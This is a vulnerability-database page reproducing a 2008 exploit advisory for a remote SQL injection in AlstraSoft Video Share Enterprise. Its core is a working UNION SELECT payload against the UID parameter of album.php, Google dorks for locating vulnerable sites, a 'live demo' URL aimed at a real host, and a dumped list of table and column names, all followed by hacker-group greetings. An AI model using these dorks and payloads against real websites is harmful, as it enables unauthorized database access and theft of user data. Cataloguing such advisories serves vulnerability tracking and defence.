Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

alstrasoftvideo-sql.txt

🗓️ 17 Jul 2008 00:00:00Reported by Hussin XType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Remote SQL injection vulnerability exists in Video Share Enterprise by AlstraSoft.

Code
`|___________________________________________________|  
|  
| Video Share Enterprise (UID) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------------Hussin X----------------------|  
|  
| Author: Hussin X  
|  
| Home : www.tryag.cc/cc  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|  
|___________________________________________________  
| |  
|  
|  
| script : http://www.alstrasoft.com/videoshare.htm  
|  
| DorK : Powered By AlstraSoft Video Share Enterprise  
| DorK : inurl:"album.php?UID="  
| DorK : inurl:"view_picture.php?viewkey="  
|___________________________________________________|  
  
Exploit:   
  
  
www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--  
  
  
L!VE DEMO: :  
  
http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--  
  
________________________  
table_name : column_name  
  
  
adv:adv_status  
adv:adv_text  
adv:adv_name  
adv:adv_id  
audio:embed  
audio:be_rated  
audio:be_comment  
audio:filehome  
audio:rate  
audio:ratedby  
audio:fav_num  
audio:featured  
audio:com_num  
audio:viewnumber  
audio:vkey  
audio:country  
audio:location  
audio:record_date  
audio:adddate  
audio:addtime  
audio:type  
audio:duration  
audio:duration  
audio:flvdoname  
audio:vdoname  
audio:channel  
audio:keyword  
audio:featuredesc  
audio:UID  
audio:description  
audio:VID  
  
________________________  
  
  
  
____________________________( Greetz )____________________________  
|  
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke  
|   
| Iraqihack | FAHD | mos_chori | Silic0n   
|  
|_________________________________________________________________  
  
  
Im IRAQi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
remote sql injectionalstrasoft video shareexploit demonstrationversion retrievalvulnerable scripts.
30